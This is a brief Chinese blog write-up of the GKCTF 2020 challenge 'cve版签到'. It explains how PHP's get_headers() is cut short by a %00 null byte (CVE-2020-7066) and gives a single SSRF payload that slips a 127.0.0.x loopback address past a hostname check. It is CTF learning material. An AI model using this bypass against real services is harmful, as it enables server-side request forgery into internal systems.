Web入门-SSRF漏洞
Web入门-SSRF漏洞
[GKCTF 2020]cve版签到
SSRF漏洞,结合CVE-2020-7066:get_headers()
会被%00截断。
payload:
1 | ?url=http://127.0.0.123%00www.ctfhub.com |
注,如下返回格式为get_headers()
的特征:
1 | Array |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 The Blog of Monoceros406!